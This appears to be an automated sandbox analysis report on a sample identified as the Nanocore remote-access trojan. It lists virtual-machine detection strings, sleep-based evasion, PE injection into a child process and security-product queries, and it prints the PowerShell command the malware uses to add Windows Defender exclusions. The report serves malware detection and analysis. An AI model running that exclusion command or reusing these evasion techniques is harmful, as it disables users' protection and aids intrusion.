Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: ZVFVY7NwZ7.exe, 00000000.00000002.333622797.0000000002E61000.00000004.00000001.sdmp

Binary or memory string: SBIEDLL.DLL0SELECT * FROM WIN32_BIOS8UNEXPECTED WMI QUERY FAILURE

Source: C:\Windows\SysWOW64\wscript.exe

File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Jump to behavior

Source: C:\Users\user\Desktop\ZVFVY7NwZ7.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Users\user\Desktop\ZVFVY7NwZ7.exe	Window / User API: threadDelayed 449	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	Window / User API: threadDelayed 7211	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	Window / User API: threadDelayed 1278	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	Window / User API: foregroundWindowGot 507	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	Window / User API: foregroundWindowGot 425	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3787	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3563	Jump to behavior

Source: C:\Users\user\Desktop\ZVFVY7NwZ7.exe TID: 6092	Thread sleep count: 449 > 30	Jump to behavior
Source: C:\Users\user\Desktop\ZVFVY7NwZ7.exe TID: 6092	Thread sleep time: -44900s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ZVFVY7NwZ7.exe TID: 3880	Thread sleep count: 180 > 30	Jump to behavior
Source: C:\Users\user\Desktop\ZVFVY7NwZ7.exe TID: 3880	Thread sleep count: 296 > 30	Jump to behavior
Source: C:\Users\user\Desktop\ZVFVY7NwZ7.exe TID: 1832	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe TID: 5264	Thread sleep time: -6456360425798339s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2200	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\ZVFVY7NwZ7.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: powershell.exe, 0000000E.00000003.417157995.0000000004CB7000.00000004.00000001.sdmp	Binary or memory string: Hyper-V
Source: ZVFVY7NwZ7.exe, 00000000.00000002.333622797.0000000002E61000.00000004.00000001.sdmp	Binary or memory string: 0VMware\|VIRTUAL\|A M I\|XenDselect * from Win32_ComputerSystem
Source: ZVFVY7NwZ7.exe, 0000000D.00000002.485533832.00000000074C0000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: ZVFVY7NwZ7.exe, 00000000.00000002.333622797.0000000002E61000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: wscript.exe, 0000000C.00000002.334056896.0000000003333000.00000004.00000020.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\d
Source: ZVFVY7NwZ7.exe, 00000000.00000002.333622797.0000000002E61000.00000004.00000001.sdmp	Binary or memory string: model0Microsoft\|VMWare\|Virtual
Source: ZVFVY7NwZ7.exe, 0000000D.00000002.485533832.00000000074C0000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: ZVFVY7NwZ7.exe, 0000000D.00000002.485533832.00000000074C0000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: ZVFVY7NwZ7.exe, 0000000D.00000002.474926808.000000000125C000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: ZVFVY7NwZ7.exe, 0000000D.00000002.485533832.00000000074C0000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: powershell.exe, 0000000E.00000003.417157995.0000000004CB7000.00000004.00000001.sdmp	Binary or memory string: l:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V

Source: C:\Users\user\Desktop\ZVFVY7NwZ7.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\ZVFVY7NwZ7.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\ZVFVY7NwZ7.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Adds a directory exclusion to Windows Defender

Show sources

Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath C:\,'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\chromee\chromee.exe'
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath C:\,'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\chromee\chromee.exe'			Jump to behavior

Allocates memory in foreign processes

Show sources

Source: C:\Users\user\Desktop\ZVFVY7NwZ7.exe

Memory allocated: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe base: 400000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\Desktop\ZVFVY7NwZ7.exe

Memory written: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe base: 400000 value starts with: 4D5A

Jump to behavior

Writes to foreign memory regions

Show sources

Source: C:\Users\user\Desktop\ZVFVY7NwZ7.exe	Memory written: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\ZVFVY7NwZ7.exe	Memory written: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe base: 402000	Jump to behavior
Source: C:\Users\user\Desktop\ZVFVY7NwZ7.exe	Memory written: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe base: 420000	Jump to behavior
Source: C:\Users\user\Desktop\ZVFVY7NwZ7.exe	Memory written: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe base: 422000	Jump to behavior
Source: C:\Users\user\Desktop\ZVFVY7NwZ7.exe	Memory written: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe base: DCB008	Jump to behavior

Source: C:\Users\user\Desktop\ZVFVY7NwZ7.exe	Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\_Lzqtfofnnzmk.vbs'	Jump to behavior
Source: C:\Users\user\Desktop\ZVFVY7NwZ7.exe	Process created: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath C:\,'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\chromee\chromee.exe'	Jump to behavior

Source: ZVFVY7NwZ7.exe, 0000000D.00000002.475304748.0000000001920000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: ZVFVY7NwZ7.exe, 0000000D.00000002.475304748.0000000001920000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: ZVFVY7NwZ7.exe, 0000000D.00000002.475304748.0000000001920000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: ZVFVY7NwZ7.exe, 0000000D.00000002.484598869.00000000065EB000.00000004.00000001.sdmp	Binary or memory string: Program Managerram Manager
Source: ZVFVY7NwZ7.exe, 0000000D.00000002.478428035.0000000003015000.00000004.00000001.sdmp	Binary or memory string: Program ManagerHa.l
Source: ZVFVY7NwZ7.exe, 0000000D.00000002.475304748.0000000001920000.00000002.00000001.sdmp	Binary or memory string: Progmanlock
Source: ZVFVY7NwZ7.exe, 0000000D.00000002.478428035.0000000003015000.00000004.00000001.sdmp	Binary or memory string: Program Manager\|$?
Source: ZVFVY7NwZ7.exe, 0000000D.00000002.478428035.0000000003015000.00000004.00000001.sdmp	Binary or memory string: Program Managerh&
Source: ZVFVY7NwZ7.exe, 0000000D.00000002.483776818.0000000005F4B000.00000004.00000001.sdmp	Binary or memory string: Program Manager

Source: C:\Users\user\Desktop\ZVFVY7NwZ7.exe	Queries volume information: C:\Users\user\Desktop\ZVFVY7NwZ7.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe

Code function: 13_2_072D1128 GetSystemTimes,

13_2_072D1128

Source: C:\Users\user\Desktop\ZVFVY7NwZ7.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct

Stealing of Sensitive Information:

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 00000000.00000002.335459284.0000000003E69000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000000.331387954.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000000.331849695.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.475975321.0000000002E91000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.469794004.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.335651817.0000000003EFF000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.481077983.0000000004080000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.337200878.00000000040C3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.484531579.0000000006490000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ZVFVY7NwZ7.exe PID: 5612, type: MEMORY
Source: Yara match	File source: 0.2.ZVFVY7NwZ7.exe.40c39d0.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ZVFVY7NwZ7.exe.40239b0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.ZVFVY7NwZ7.exe.408a169.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.ZVFVY7NwZ7.exe.6494629.20.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.ZVFVY7NwZ7.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.ZVFVY7NwZ7.exe.6490000.21.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.ZVFVY7NwZ7.exe.6490000.21.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ZVFVY7NwZ7.exe.40239b0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.ZVFVY7NwZ7.exe.4085b40.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.ZVFVY7NwZ7.exe.4085b40.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.0.ZVFVY7NwZ7.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.0.ZVFVY7NwZ7.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ZVFVY7NwZ7.exe.3eff6b0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ZVFVY7NwZ7.exe.40c39d0.7.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Detected Nanocore Rat

Show sources

Source: ZVFVY7NwZ7.exe, 00000000.00000002.333737756.0000000002E9F000.00000004.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: ZVFVY7NwZ7.exe, 0000000D.00000002.484283906.0000000006400000.00000004.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
